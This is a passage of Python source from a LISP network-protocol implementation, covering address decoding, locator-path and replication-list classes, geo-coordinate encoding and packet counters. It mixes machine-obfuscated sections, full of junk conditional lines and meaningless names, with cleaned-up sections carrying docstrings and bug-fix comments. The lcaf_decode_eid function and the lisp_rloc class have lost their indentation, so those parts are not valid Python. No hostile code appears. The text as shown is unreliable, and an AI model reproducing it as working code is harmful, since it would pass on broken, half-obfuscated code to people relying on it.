  oO0o00O = struct . calcsize ( o00OooooOOOO )
  if ( len ( packet ) < oO0o00O ) : return ( [ None , None ] )
  if ( iI1 < oO0o00O ) : return ( [ None , None ] )
  if 63 - 63: I11i
  oO0oO00 = struct . unpack ( o00OooooOOOO , packet [ : oO0o00O ] ) [ 0 ]
  packet = packet [ oO0o00O : : ]
  iI1 -= oO0o00O
  self . afi = socket . ntohs ( oO0oO00 )
  self . mask_len = iI1i1i
  IIiIi1II1IiI = self . addr_length ( )
  if ( iI1 < IIiIi1II1IiI ) : return ( [ None , None ] )
  if 60 - 60: I1IiiI / I1ii11iIi11i / I11i / Ii1I + iIii1I11I1II1
  packet = self . unpack_address ( packet )
  if ( packet == None ) : return ( [ None , None ] )
  if 85 - 85: O0 / OOooOOo . OoOoOO00 / I1ii11iIi11i
  iI1 -= IIiIi1II1IiI
  if 80 - 80: I1ii11iIi11i * iII111i % i1IIi * OOooOOo % II111iiii % i1IIi
  if 44 - 44: OoooooooOO
  if 18 - 18: i11iIiiIii
  if 65 - 65: i1IIi . iIii1I11I1II1 % iIii1I11I1II1
  if 35 - 35: iIii1I11I1II1 - o0oOOo0O0Ooo + I1ii11iIi11i * iII111i - OOooOOo . o0oOOo0O0Ooo
  # Group: 16-bit AFI, then the address body, into a fresh lisp_address
  # that inherits the source's instance-id.
  o00OooooOOOO = "H"
  oO0o00O = struct . calcsize ( o00OooooOOOO )
  if ( len ( packet ) < oO0o00O ) : return ( [ None , None ] )
  if ( iI1 < oO0o00O ) : return ( [ None , None ] )
  if 12 - 12: iIii1I11I1II1 % OoO0O00 * Oo0Ooo
  oO0oO00 = struct . unpack ( o00OooooOOOO , packet [ : oO0o00O ] ) [ 0 ]
  packet = packet [ oO0o00O : : ]
  iI1 -= oO0o00O
  oOoooOOO0o0 = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
  oOoooOOO0o0 . afi = socket . ntohs ( oO0oO00 )
  oOoooOOO0o0 . mask_len = iiii
  oOoooOOO0o0 . instance_id = self . instance_id
  # NOTE(review): this length check uses self.addr_length(), i.e. the
  # *source* AFI's size, not the group's -- presumably S and G always
  # share an address family; confirm before changing.
  IIiIi1II1IiI = self . addr_length ( )
  if ( iI1 < IIiIi1II1IiI ) : return ( [ None , None ] )
  if 5 - 5: I11i - II111iiii * iIii1I11I1II1 / iIii1I11I1II1 % IiII * i1IIi
  packet = oOoooOOO0o0 . unpack_address ( packet )
  if ( packet == None ) : return ( [ None , None ] )
  if 30 - 30: i1IIi % I1IiiI . OOooOOo % iIii1I11I1II1 . I1ii11iIi11i / o0oOOo0O0Ooo
  return ( [ packet , oOoooOOO0o0 ] )
if 53 - 53: OOooOOo % ooOoO0o
if 94 - 94: OOooOOo - O0 - I1Ii111 / OoooooooOO - iII111i
def lcaf_decode_eid ( self , packet ) :
o00OooooOOOO = "BBB"
oO0o00O = struct . calcsize ( o00OooooOOOO )
if ( len ( packet ) < oO0o00O ) : return ( [ None , None ] )
if 83 - 83: OOooOOo * I1ii11iIi11i * iII111i * I1ii11iIi11i . OoO0O00
if 87 - 87: ooOoO0o . O0 - oO0o
if 75 - 75: Oo0Ooo
if 22 - 22: oO0o * I1Ii111 . II111iiii / Ii1I * O0
if 33 - 33: oO0o * i1IIi + ooOoO0o * OOooOOo - O0 - iIii1I11I1II1
O0Ooo000Ooo , OO000OOO , iiii1II = struct . unpack ( o00OooooOOOO ,
packet [ : oO0o00O ] )
if 35 - 35: I1Ii111
if ( iiii1II == LISP_LCAF_INSTANCE_ID_TYPE ) :
return ( [ self . lcaf_decode_iid ( packet ) , None ] )
elif ( iiii1II == LISP_LCAF_MCAST_INFO_TYPE ) :
packet , oOoooOOO0o0 = self . lcaf_decode_sg ( packet )
return ( [ packet , oOoooOOO0o0 ] )
elif ( iiii1II == LISP_LCAF_GEO_COORD_TYPE ) :
o00OooooOOOO = "BBBBH"
oO0o00O = struct . calcsize ( o00OooooOOOO )
if ( len ( packet ) < oO0o00O ) : return ( None )
if 12 - 12: Ii1I % I1IiiI - I11i / iIii1I11I1II1 . I1IiiI % I1ii11iIi11i
Ooo0o00O0O0oO , OO000OOO , iiii1II , o000OOooo000O , o00O0oOO0o = struct . unpack ( o00OooooOOOO , packet [ : oO0o00O ] )
if 12 - 12: Oo0Ooo + I1IiiI
if 12 - 12: OoOoOO00 / II111iiii
if ( iiii1II != LISP_LCAF_GEO_COORD_TYPE ) : return ( None )
if 100 - 100: I1ii11iIi11i % iIii1I11I1II1 . IiII . OoooooooOO / II111iiii
o00O0oOO0o = socket . ntohs ( o00O0oOO0o )
packet = packet [ oO0o00O : : ]
if ( o00O0oOO0o > len ( packet ) ) : return ( None )
if 28 - 28: I1IiiI
OOoooo = lisp_geo ( "" )
self . instance_id = 0
self . afi = LISP_AFI_GEO_COORD
self . address = OOoooo
packet = OOoooo . decode_geo ( packet , o00O0oOO0o , o000OOooo000O )
self . mask_len = self . host_mask_len ( )
if 27 - 27: I1IiiI % oO0o - iIii1I11I1II1 - o0oOOo0O0Ooo - IiII - O0
return ( [ packet , None ] )
if 46 - 46: II111iiii
if 24 - 24: i11iIiiIii * i1IIi - I11i + o0oOOo0O0Ooo
if 60 - 60: ooOoO0o
if 62 - 62: i11iIiiIii
if 88 - 88: i11iIiiIii
if 59 - 59: oO0o - OoooooooOO % ooOoO0o
class lisp_elp_node():
    """One hop of an Explicit Locator Path (ELP)."""

    def __init__(self):
        self.address = lisp_address(LISP_AFI_NONE, "", 0, 0)
        self.probe = False        # RLOC-probe this hop
        self.strict = False       # strict (must-traverse) hop
        self.eid = False          # hop address is an EID rather than an RLOC
        self.we_are_last = False  # set when this node is us at the ELP tail

    def copy_elp_node(self):
        """Return a copy of this ELP node with a copied address."""
        node = lisp_elp_node()
        # Bug fix: the original called node.copy_address(self.address),
        # but lisp_elp_node has no copy_address() method (guaranteed
        # AttributeError).  Copy the embedded address instead, matching
        # lisp_rle_node.copy_rle_node().
        node.address.copy_address(self.address)
        node.probe = self.probe
        node.strict = self.strict
        node.eid = self.eid
        node.we_are_last = self.we_are_last
        return node
if 84 - 84: I1IiiI . I1IiiI
if 82 - 82: OoO0O00 - iIii1I11I1II1 . iIii1I11I1II1 + I1ii11iIi11i
if 45 - 45: iII111i . oO0o * iII111i
class lisp_elp ( ) :
 # An Explicit Locator Path: an ordered list of lisp_elp_node hops.
 def __init__ ( self , name ) :
  self . elp_name = name
  self . elp_nodes = [ ]
  # Next-hop node this system forwards to, set by select_elp_node();
  # None when we are the final hop.
  self . use_elp_node = None
  self . we_are_last = False
 if 3 - 3: OoOoOO00 / Oo0Ooo - Oo0Ooo
 if 54 - 54: Oo0Ooo . OoO0O00 * I1IiiI % IiII
 def copy_elp ( self ) :
  # Return a copy of this ELP with per-node copies.
  OOo0oo0OOOO = lisp_elp ( self . elp_name )
  OOo0oo0OOOO . use_elp_node = self . use_elp_node
  OOo0oo0OOOO . we_are_last = self . we_are_last
  for Oo0ooOOOOOoO in self . elp_nodes :
   OOo0oo0OOOO . elp_nodes . append ( Oo0ooOOOOOoO . copy_elp_node ( ) )
  if 97 - 97: o0oOOo0O0Ooo + Ii1I
  return ( OOo0oo0OOOO )
 if 77 - 77: I11i - oO0o . Ii1I
 if 75 - 75: I11i * OoooooooOO % OoOoOO00 . i1IIi - Ii1I + iIii1I11I1II1
 def print_elp ( self , want_marker ) :
  # Render the path as "addr(rPS), ..." -- each flag letter upper-case
  # when set.  With want_marker, "*" marks the selected next-hop and
  # "x" marks us as the last hop.
  iIii1IiI = ""
  for Oo0ooOOOOOoO in self . elp_nodes :
   ooOOoO0Oo0OoO = ""
   if ( want_marker ) :
    if ( Oo0ooOOOOOoO == self . use_elp_node ) :
     ooOOoO0Oo0OoO = "*"
    elif ( Oo0ooOOOOOoO . we_are_last ) :
     ooOOoO0Oo0OoO = "x"
    if 10 - 10: ooOoO0o
   if 86 - 86: OoOoOO00 / Ii1I
   iIii1IiI += "{}{}({}{}{}), " . format ( ooOOoO0Oo0OoO ,
    Oo0ooOOOOOoO . address . print_address_no_iid ( ) ,
    "r" if Oo0ooOOOOOoO . eid else "R" , "P" if Oo0ooOOOOOoO . probe else "p" ,
    "S" if Oo0ooOOOOOoO . strict else "s" )
  if 80 - 80: II111iiii
  # Strip the trailing ", ".
  return ( iIii1IiI [ 0 : - 2 ] if iIii1IiI != "" else "" )
 if 66 - 66: ooOoO0o
 if 61 - 61: O0 / II111iiii + I1IiiI + I1ii11iIi11i * Oo0Ooo * I1ii11iIi11i
 def select_elp_node ( self ) :
  # Locate one of our own RLOCs (v4 or v6, from global lisp_myrlocs)
  # in the path, then select the node that follows it.  If we are not
  # in the path at all, forward to the head node.
  Ii11Ii1IiiIi , oO0Oo0O000 , OO0oo00oOO = lisp_myrlocs
  OO000o00 = None
  if 80 - 80: OOooOOo % OoO0O00 + OoOoOO00 % iII111i % OoooooooOO - ooOoO0o
  for Oo0ooOOOOOoO in self . elp_nodes :
   if ( Ii11Ii1IiiIi and Oo0ooOOOOOoO . address . is_exact_match ( Ii11Ii1IiiIi ) ) :
    OO000o00 = self . elp_nodes . index ( Oo0ooOOOOOoO )
    break
   if 25 - 25: OoOoOO00 % i11iIiiIii - I1IiiI * iIii1I11I1II1 - Oo0Ooo . O0
   if ( oO0Oo0O000 and Oo0ooOOOOOoO . address . is_exact_match ( oO0Oo0O000 ) ) :
    OO000o00 = self . elp_nodes . index ( Oo0ooOOOOOoO )
    break
   if 48 - 48: I1IiiI + oO0o % i11iIiiIii % iIii1I11I1II1
  if 14 - 14: iIii1I11I1II1
  if 78 - 78: I1Ii111 / Oo0Ooo - I1Ii111
  if 1 - 1: OoO0O00 - I1IiiI * o0oOOo0O0Ooo
  if 84 - 84: OoO0O00 % OoooooooOO
  if 66 - 66: OoOoOO00 . iII111i
  if 1 - 1: iII111i * i1IIi . iIii1I11I1II1 % O0 - OoooooooOO
  # NOTE(review): the loop variable is referenced after the loop here
  # and below -- it names the last node iterated, and is unbound when
  # elp_nodes is empty.  Preserved as-is.
  if ( OO000o00 == None ) :
   self . use_elp_node = self . elp_nodes [ 0 ]
   Oo0ooOOOOOoO . we_are_last = False
   return
  if 87 - 87: iII111i . Oo0Ooo * i11iIiiIii % o0oOOo0O0Ooo + Ii1I
  if 72 - 72: Ii1I / II111iiii + o0oOOo0O0Ooo
  if 33 - 33: I1Ii111 * OoOoOO00 - OoooooooOO
  if 11 - 11: I1Ii111 - Oo0Ooo / iIii1I11I1II1 - OoooooooOO
  if 71 - 71: Oo0Ooo + Ii1I - OoooooooOO + I11i - iIii1I11I1II1 / O0
  if 76 - 76: i11iIiiIii % o0oOOo0O0Ooo . O0 * I11i
  # We are the final hop: nothing further to forward to.
  if ( self . elp_nodes [ - 1 ] == self . elp_nodes [ OO000o00 ] ) :
   self . use_elp_node = None
   Oo0ooOOOOOoO . we_are_last = True
   return
  if 90 - 90: II111iiii + OOooOOo % I1Ii111 * iIii1I11I1II1 % iIii1I11I1II1
  if 55 - 55: II111iiii % O0 * O0 - II111iiii * I1IiiI % Oo0Ooo
  if 48 - 48: I1ii11iIi11i + OoooooooOO % i1IIi
  if 46 - 46: OoOoOO00
  if 75 - 75: I1IiiI
  # Forward to the node immediately after us in the path.
  self . use_elp_node = self . elp_nodes [ OO000o00 + 1 ]
  return
if 37 - 37: iIii1I11I1II1 % OoO0O00 * ooOoO0o + I11i % ooOoO0o / i11iIiiIii
if 14 - 14: i1IIi / ooOoO0o
if 10 - 10: ooOoO0o / OoooooooOO - ooOoO0o % O0 + oO0o - oO0o
class lisp_geo():
    """
    A geo-coordinate in degrees/minutes/seconds form with optional
    altitude and radius, as carried in the LISP Geo-Coordinates LCAF.

    Sign convention (preserved from the original code): latitude is
    stored negative for the northern hemisphere and longitude negative
    for the eastern hemisphere.  parse_geo_string(), print_geo(),
    encode_geo()/decode_geo() and dms_to_decimal() all agree on this.
    """

    def __init__(self, name):
        self.geo_name = name
        self.latitude = 0xffffffff   # invalid until parsed/decoded
        self.lat_mins = 0
        self.lat_secs = 0
        self.longitude = 0xffffffff  # invalid until parsed/decoded
        self.long_mins = 0
        self.long_secs = 0
        self.altitude = -1           # -1 means "no altitude present"
        self.radius = 0              # kilometers; 0 means point, not circle

    def copy_geo(self):
        """Return a field-by-field copy of this geo object."""
        geo = lisp_geo(self.geo_name)
        geo.latitude = self.latitude
        geo.lat_mins = self.lat_mins
        geo.lat_secs = self.lat_secs
        geo.longitude = self.longitude
        geo.long_mins = self.long_mins
        geo.long_secs = self.long_secs
        geo.altitude = self.altitude
        geo.radius = self.radius
        return geo

    def no_geo_altitude(self):
        """True when no altitude was supplied."""
        return self.altitude == -1

    def parse_geo_string(self, geo_str):
        """
        Parse "lat-mins-secs-{N|S}-long-mins-secs-{E|W}[-alt][/radius]",
        optionally preceded by a "[iid]" bracket prefix.  Returns True
        on success, False for a malformed string.
        """
        index = geo_str.find("]")
        if (index != -1): geo_str = geo_str[index + 1::]

        # Optional "/radius" suffix (kilometers) makes this a geo-circle.
        if (geo_str.find("/") != -1):
            geo_str, radius = geo_str.split("/")
            self.radius = int(radius)

        geo_str = geo_str.split("-")
        if (len(geo_str) < 8): return(False)

        latitude = geo_str[0:4]
        longitude = geo_str[4:8]

        # Optional altitude after the 8 fixed fields.
        if (len(geo_str) > 8): self.altitude = int(geo_str[8])

        self.latitude = int(latitude[0])
        self.lat_mins = int(latitude[1])
        self.lat_secs = int(latitude[2])
        if (latitude[3] == "N"): self.latitude = -self.latitude

        self.longitude = int(longitude[0])
        self.long_mins = int(longitude[1])
        self.long_secs = int(longitude[2])
        if (longitude[3] == "E"): self.longitude = -self.longitude
        return(True)

    def print_geo(self):
        """Inverse of parse_geo_string() (without any "[iid]" prefix)."""
        lat_hemi = "N" if self.latitude < 0 else "S"
        long_hemi = "E" if self.longitude < 0 else "W"

        geo_str = "{}-{}-{}-{}-{}-{}-{}-{}".format(abs(self.latitude),
            self.lat_mins, self.lat_secs, lat_hemi, abs(self.longitude),
            self.long_mins, self.long_secs, long_hemi)

        if (self.no_geo_altitude() == False):
            geo_str += "-" + str(self.altitude)

        # Append radius when this is a geo-circle.
        if (self.radius != 0): geo_str += "/{}".format(self.radius)
        return(geo_str)

    def geo_url(self):
        """Return a Google static-map URL centered on this point."""
        zoom = os.getenv("LISP_GEO_ZOOM_LEVEL")
        # Bug fix: os.getenv() returns None when the variable is unset,
        # and the original then crashed on None.isdigit().  Default to
        # zoom level 10 for unset, empty, or non-numeric values.
        if (zoom == None or zoom.isdigit() == False): zoom = "10"

        lat, lon = self.dms_to_decimal()
        url = ("http://maps.googleapis.com/maps/api/staticmap?center={},{}" + \
            "&markers=color:blue%7Clabel:lisp%7C{},{}" + \
            "&zoom={}&size=1024x1024&sensor=false").format(lat, lon, lat,
            lon, zoom)
        return(url)

    def print_geo_url(self):
        """Return an HTML anchor for this geo point or circle."""
        geo_str = self.print_geo()
        if (self.radius == 0):
            url = self.geo_url()
            html = "<a href='{}'>{}</a>".format(url, geo_str)
        else:
            # Circles link to the internal geo-map page instead.
            url = geo_str.replace("/", "-")
            html = "<a href='/lisp/geo-map/{}'>{}</a>".format(url, geo_str)
        return(html)

    def dms_to_decimal(self):
        """
        Return (lat, lon) in conventional signed decimal degrees
        (north/east positive), undoing the internal sign convention.
        """
        degrees, mins, secs = self.latitude, self.lat_mins, self.lat_secs
        dd = float(abs(degrees))
        dd += float(mins * 60 + secs) / 3600
        if (degrees > 0): dd = -dd
        dd_lat = dd

        degrees, mins, secs = self.longitude, self.long_mins, self.long_secs
        dd = float(abs(degrees))
        dd += float(mins * 60 + secs) / 3600
        if (degrees > 0): dd = -dd
        dd_long = dd
        return((dd_lat, dd_long))

    def get_distance(self, geo_point):
        """Distance in kilometers to 'geo_point' (vincenty geodesic)."""
        dd_prefix = self.dms_to_decimal()
        dd_point = geo_point.dms_to_decimal()
        distance = vincenty(dd_prefix, dd_point)
        return(distance.km)

    def point_in_circle(self, geo_point):
        """True when 'geo_point' lies within this geo-circle's radius."""
        km = self.get_distance(geo_point)
        return(km <= self.radius)

    def encode_geo(self):
        """Encode as a Geo-Coordinates LCAF (with a trailing AFI of 0)."""
        lcaf_afi = socket.htons(LISP_AFI_LCAF)
        geo_len = socket.htons(20 + 2)  # fixed geo payload plus AFI field
        flags = 0

        lat = abs(self.latitude)
        lat_ms = ((self.lat_mins * 60) + self.lat_secs) * 1000
        if (self.latitude < 0): flags |= 0x40   # north

        lon = abs(self.longitude)
        long_ms = ((self.long_mins * 60) + self.long_secs) * 1000
        if (self.longitude < 0): flags |= 0x20  # east

        alt = 0
        if (self.no_geo_altitude() == False):
            alt = socket.htonl(self.altitude)
            flags |= 0x10

        radius = socket.htons(self.radius)
        if (radius != 0): flags |= 0x06  # radius present, in kilometers

        pkt = struct.pack("HBBBBH", lcaf_afi, 0, 0, LISP_LCAF_GEO_COORD_TYPE,
            0, geo_len)
        pkt += struct.pack("BBHBBHBBHIHHH", flags, 0, 0, lat, lat_ms >> 16,
            socket.htons(lat_ms & 0x0ffff), lon, long_ms >> 16,
            socket.htons(long_ms & 0xffff), alt, radius, 0, 0)
        return(pkt)

    def decode_geo(self, packet, lcaf_len, radius_hi):
        """
        Decode a Geo-Coordinates LCAF payload into self.  Returns the
        remaining packet bytes, or None on error.  'radius_hi' is kept
        for interface compatibility but is not used here.
        """
        packet_format = "BBHBBHBBHIHHH"
        format_size = struct.calcsize(packet_format)
        if (lcaf_len < format_size): return(None)

        flags, rsvd, unused, lat, lat_ms_hi, lat_ms, lon, long_ms_hi, \
            long_ms, alt, radius, rsvd2, afi = struct.unpack(packet_format,
            packet[:format_size])

        afi = socket.ntohs(afi)
        if (afi == LISP_AFI_LCAF): return(None)

        # True division kept as in the original; under Python 3 the
        # minute fields come out as floats.
        if (flags & 0x40): lat = -lat  # north
        self.latitude = lat
        lat_secs = ((lat_ms_hi << 16) | socket.ntohs(lat_ms)) / 1000
        self.lat_mins = lat_secs / 60
        self.lat_secs = lat_secs % 60

        if (flags & 0x20): lon = -lon  # east
        self.longitude = lon
        long_secs = ((long_ms_hi << 16) | socket.ntohs(long_ms)) / 1000
        self.long_mins = long_secs / 60
        self.long_secs = long_secs % 60

        self.altitude = socket.ntohl(alt) if (flags & 0x10) else -1
        radius = socket.ntohs(radius)
        self.radius = radius if (flags & 0x02) else radius * 1000

        self.geo_name = None
        packet = packet[format_size::]

        if (afi != 0):
            # NOTE(review): self.rloc is never set by __init__; this
            # path appears to assume a caller attached an rloc attribute
            # beforehand -- confirm before relying on it.
            self.rloc.afi = afi
            packet = self.rloc.unpack_address(packet)
            self.rloc.mask_len = self.rloc.host_mask_len()
        return(packet)
if 25 - 25: i1IIi % Oo0Ooo . i1IIi * OoOoOO00 . Ii1I % OoO0O00
if 47 - 47: o0oOOo0O0Ooo - i11iIiiIii / OoooooooOO
if 93 - 93: I1IiiI * II111iiii * O0 % o0oOOo0O0Ooo + oO0o / ooOoO0o
if 79 - 79: OoO0O00 + ooOoO0o / oO0o % I1ii11iIi11i
if 77 - 77: Ii1I / Ii1I / I1ii11iIi11i
if 92 - 92: O0 * i11iIiiIii . OoOoOO00 * IiII / o0oOOo0O0Ooo * ooOoO0o
class lisp_rle_node():
    """One replication target in a Replication List Entry (RLE)."""

    def __init__(self):
        self.address = lisp_address(LISP_AFI_NONE, "", 0, 0)
        self.level = 0             # replication level
        self.translated_port = 0   # NAT-translated encap port; 0 = none
        self.rloc_name = None

    def copy_rle_node(self):
        """Return a copy of this RLE node."""
        rle_node = lisp_rle_node()
        rle_node.address.copy_address(self.address)
        rle_node.level = self.level
        rle_node.translated_port = self.translated_port
        rle_node.rloc_name = self.rloc_name
        return rle_node

    def store_translated_rloc(self, rloc, port):
        """Record the NAT-translated RLOC address and port for this node."""
        self.address.copy_address(rloc)
        self.translated_port = port

    def get_encap_keys(self):
        """
        Look up encap crypto keys for this RLOC in the global
        lisp_crypto_keys_by_rloc_encap table.  Returns a tuple
        (encrypt-key, icv-key), or (None, None) when no keys exist.
        """
        port = "4341" if self.translated_port == 0 else \
            str(self.translated_port)
        addr_str = self.address.print_address_no_iid() + ":" + port

        try:
            keys = lisp_crypto_keys_by_rloc_encap[addr_str]
            if (keys[1]): return(keys[1].encrypt_key, keys[1].icv_key)
            return(None, None)
        except Exception:
            # Narrowed from a bare "except:" so SystemExit and
            # KeyboardInterrupt are no longer swallowed; missing or
            # malformed key entries still yield (None, None).
            return(None, None)
if 46 - 46: I1ii11iIi11i
if 32 - 32: iII111i * i11iIiiIii / IiII + i11iIiiIii + O0
if 51 - 51: I1Ii111
if 95 - 95: Ii1I / Ii1I * OoO0O00 . OoooooooOO . OoooooooOO * I11i
class lisp_rle ( ) :
 # A Replication List Entry: multicast replication targets grouped by
 # level.  Packets are replicated to all nodes at the selected level.
 def __init__ ( self , name ) :
  self . rle_name = name
  self . rle_nodes = [ ]
  # Subset of rle_nodes this system actually replicates to, computed
  # by build_forwarding_list().
  self . rle_forwarding_list = [ ]
 if 76 - 76: OoooooooOO - Ii1I + IiII % OoOoOO00 / OoooooooOO
 if 55 - 55: i11iIiiIii - IiII * OOooOOo + II111iiii . I1ii11iIi11i / O0
 def copy_rle ( self ) :
  # Deep-copy the RLE and recompute its forwarding list.
  OoO000oo000o0 = lisp_rle ( self . rle_name )
  for Oo0000O00o0 in self . rle_nodes :
   OoO000oo000o0 . rle_nodes . append ( Oo0000O00o0 . copy_rle_node ( ) )
  if 16 - 16: II111iiii . Oo0Ooo * I1Ii111 + o0oOOo0O0Ooo - i11iIiiIii
  OoO000oo000o0 . build_forwarding_list ( )
  return ( OoO000oo000o0 )
 if 98 - 98: II111iiii - i1IIi - ooOoO0o
 if 36 - 36: IiII + o0oOOo0O0Ooo
 def print_rle ( self , html ) :
  # Render "addr[:port](Llevel)rloc-name, ..." for display.  Local
  # addresses are rendered red, rloc-names blue, when html is set.
  Oo0iIIIIi = ""
  for Oo0000O00o0 in self . rle_nodes :
   IIi1I1iII111 = Oo0000O00o0 . translated_port
   OO00O = blue ( Oo0000O00o0 . rloc_name , html ) if Oo0000O00o0 . rloc_name != None else ""
   if 62 - 62: II111iiii . oO0o / I11i . oO0o / i1IIi + o0oOOo0O0Ooo
   oOo0O = Oo0000O00o0 . address . print_address_no_iid ( )
   if ( Oo0000O00o0 . address . is_local ( ) ) : oOo0O = red ( oOo0O , html )
   Oo0iIIIIi += "{}{}(L{}){}, " . format ( oOo0O , "" if IIi1I1iII111 == 0 else ":" + str ( IIi1I1iII111 ) , Oo0000O00o0 . level ,
    "" if Oo0000O00o0 . rloc_name == None else OO00O )
  if 4 - 4: Ii1I - iII111i + i1IIi - I1Ii111 / iII111i . Oo0Ooo
  # Strip the trailing ", ".
  return ( Oo0iIIIIi [ 0 : - 2 ] if Oo0iIIIIi != "" else "" )
 if 18 - 18: oO0o % iIii1I11I1II1 + ooOoO0o
 if 34 - 34: I1IiiI - OoooooooOO . IiII - OOooOOo % IiII
 def build_forwarding_list ( self ) :
  # Find the level at which one of our own RLOCs appears; the chosen
  # forwarding level is then the next level above it (or 0 when we are
  # not in the RLE).  Level-128 nodes are included with level 0.
  i1Ii = - 1
  for Oo0000O00o0 in self . rle_nodes :
   if ( i1Ii == - 1 ) :
    if ( Oo0000O00o0 . address . is_local ( ) ) : i1Ii = Oo0000O00o0 . level
   else :
    if ( Oo0000O00o0 . level > i1Ii ) : break
   if 19 - 19: IiII + I1ii11iIi11i % Oo0Ooo
   if 32 - 32: OOooOOo
  # NOTE(review): the loop variable is referenced after the loop; the
  # last node examined supplies the next-level value.  rle_nodes is
  # assumed non-empty and sorted by level here -- confirm with callers.
  i1Ii = 0 if i1Ii == - 1 else Oo0000O00o0 . level
  if 46 - 46: II111iiii . OoO0O00
  self . rle_forwarding_list = [ ]
  for Oo0000O00o0 in self . rle_nodes :
   if ( Oo0000O00o0 . level == i1Ii or ( i1Ii == 0 and
    Oo0000O00o0 . level == 128 ) ) :
    # An ITR/ETR excludes its own local RLOC; an RTR keeps it.
    if ( lisp_i_am_rtr == False and Oo0000O00o0 . address . is_local ( ) ) :
     oOo0O = Oo0000O00o0 . address . print_address_no_iid ( )
     lprint ( "Exclude local RLE RLOC {}" . format ( oOo0O ) )
     continue
    if 97 - 97: oO0o
    self . rle_forwarding_list . append ( Oo0000O00o0 )
if 45 - 45: i11iIiiIii / IiII + OoO0O00
if 55 - 55: Ii1I / II111iiii - oO0o
if 58 - 58: i1IIi . OoooooooOO % iIii1I11I1II1 * o0oOOo0O0Ooo + O0 / oO0o
if 77 - 77: I11i . I1ii11iIi11i
if 92 - 92: i11iIiiIii + I11i % I1IiiI / ooOoO0o
class lisp_json():
    """
    A named JSON string stored in the global lisp_json_list table
    (e.g. JSON attributes carried in RLOC-records).
    """

    def __init__(self, name, string):
        self.json_name = name
        self.json_string = string

    def add(self):
        """Store this entry in lisp_json_list under its name, replacing
        any existing entry with the same name."""
        self.delete()
        lisp_json_list[self.json_name] = self

    def delete(self):
        """Remove this entry's name from lisp_json_list.

        Fix: dict.has_key() is Python-2-only and deprecated; use 'in'.
        """
        if (self.json_name in lisp_json_list):
            del(lisp_json_list[self.json_name])
            # Preserved behavior: the slot is re-created holding None
            # (add() immediately overwrites it with the new entry).
            lisp_json_list[self.json_name] = None

    def print_json(self, html):
        """Return the JSON string for display; an invalid JSON string is
        wrapped in "***" markers (rendered red when html is requested)."""
        good_string = self.json_string
        marker = "***"
        if (html): marker = red(marker, html)
        bad_string = marker + self.json_string + marker
        if (self.valid_json()): return good_string
        return bad_string

    def valid_json(self):
        """True when json_string parses as JSON.

        Fix: narrowed a bare 'except:' to 'except Exception:' so system
        exits/interrupts are not swallowed; any parse failure still means
        invalid.
        """
        try:
            json.loads(self.json_string)
        except Exception:
            return False
        return True
class lisp_stats():
    """
    Packet and byte counters plus rate bookkeeping for one traffic
    stream, with helpers to render counts/rates for display.
    """

    def __init__(self):
        self.packet_count = 0
        self.byte_count = 0
        self.last_rate_check = 0
        self.last_packet_count = 0
        self.last_byte_count = 0
        self.last_increment = None

    def increment(self, octets):
        """Count one packet of *octets* bytes and stamp the time."""
        self.packet_count += 1
        self.byte_count += octets
        self.last_increment = lisp_get_timestamp()

    def recent_packet_sec(self):
        """True when a packet was counted within the last second."""
        if self.last_increment == None: return False
        return (time.time() - self.last_increment) <= 1

    def recent_packet_min(self):
        """True when a packet was counted within the last minute."""
        if self.last_increment == None: return False
        return (time.time() - self.last_increment) <= 60

    def stat_colors(self, c1, c2, html):
        """Color the two count strings by recent activity (last second,
        last minute, or plain)."""
        if self.recent_packet_sec():
            return green_last_sec(c1), green_last_sec(c2)
        if self.recent_packet_min():
            return green_last_min(c1), green_last_min(c2)
        return c1, c2

    def normalize(self, count):
        """Shorten a large count with a T/B/M suffix (precision varies by
        magnitude, preserved from the original implementation)."""
        count = str(count)
        digits = len(count)
        if digits > 12:
            return count[0:-10] + "." + count[-10:-7] + "T"
        if digits > 9:
            return count[0:-9] + "." + count[-9:-7] + "B"
        if digits > 6:
            return count[0:-6] + "." + count[-6] + "M"
        return count

    def get_stats(self, summary, html):
        """Render counters and the packet/bit rates since the previous
        call; *summary* selects the compact hover form, *html* the HTML
        decoration."""
        prev_check = self.last_rate_check
        prev_packets = self.last_packet_count
        prev_bytes = self.last_byte_count
        self.last_rate_check = lisp_get_timestamp()
        self.last_packet_count = self.packet_count
        self.last_byte_count = self.byte_count

        interval = self.last_rate_check - prev_check
        if interval == 0:
            packet_rate = 0
            bit_rate = 0
        else:
            packet_rate = int((self.packet_count - prev_packets) / interval)
            bit_rate = (self.byte_count - prev_bytes) / interval
            # Bytes/sec -> megabits/sec.
            bit_rate = round((bit_rate * 8) / 1000000, 2)

        packets = self.normalize(self.packet_count)
        octets = self.normalize(self.byte_count)

        if summary:
            separator = "<br>" if html else ""
            packets, octets = self.stat_colors(packets, octets, html)
            hover = "packet-count: {}{}byte-count: {}".format(packets,
                separator, octets)
            output = "packet-rate: {} pps\nbit-rate: {} Mbps".format(
                packet_rate, bit_rate)
            if html != "": output = lisp_span(hover, output)
        else:
            rate_str = str(packet_rate)
            bit_str = str(bit_rate)
            if html:
                packets = lisp_print_cour(packets)
                rate_str = lisp_print_cour(rate_str)
                octets = lisp_print_cour(octets)
                bit_str = lisp_print_cour(bit_str)
            separator = "<br>" if html else ", "
            output = ("packet-count: {}{}packet-rate: {} pps{}byte-count: "
                "{}{}bit-rate: {} mbps").format(packets, separator, rate_str,
                separator, octets, separator, bit_str)
        return output
# Decapsulation counters, one independent lisp_stats per accept/drop reason.
lisp_decap_stats = {
    reason: lisp_stats() for reason in (
        "good-packets", "ICV-error", "checksum-error", "lisp-header-error",
        "no-decrypt-key", "bad-inner-version", "outer-header-error"
    )
}
# One Routing Locator (RLOC) entry for a mapping: address, NAT translation
# state, priority/weight parameters, RLOC-probe/RTT history, and the
# optional RLE/ELP/geo/JSON attributes carried in an RLOC-record.
class lisp_rloc ( ) :
# Initialize every field.  When recurse is True and the system has several
# default-route next-hops, clone this entry once per extra next-hop and
# chain the clones through self.next_rloc (one probe state per next-hop).
def __init__ ( self , recurse = True ) :
self . rloc = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . rloc_name = None
self . interface = None
self . translated_rloc = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . translated_port = 0
self . priority = 255
self . weight = 0
self . mpriority = 255
self . mweight = 0
self . uptime = 0
self . state = LISP_RLOC_UP_STATE
self . last_state_change = None
self . rle_name = None
self . elp_name = None
self . geo_name = None
self . json_name = None
self . geo = None
self . elp = None
self . rle = None
self . json = None
self . stats = lisp_stats ( )
self . last_rloc_probe = None
self . last_rloc_probe_reply = None
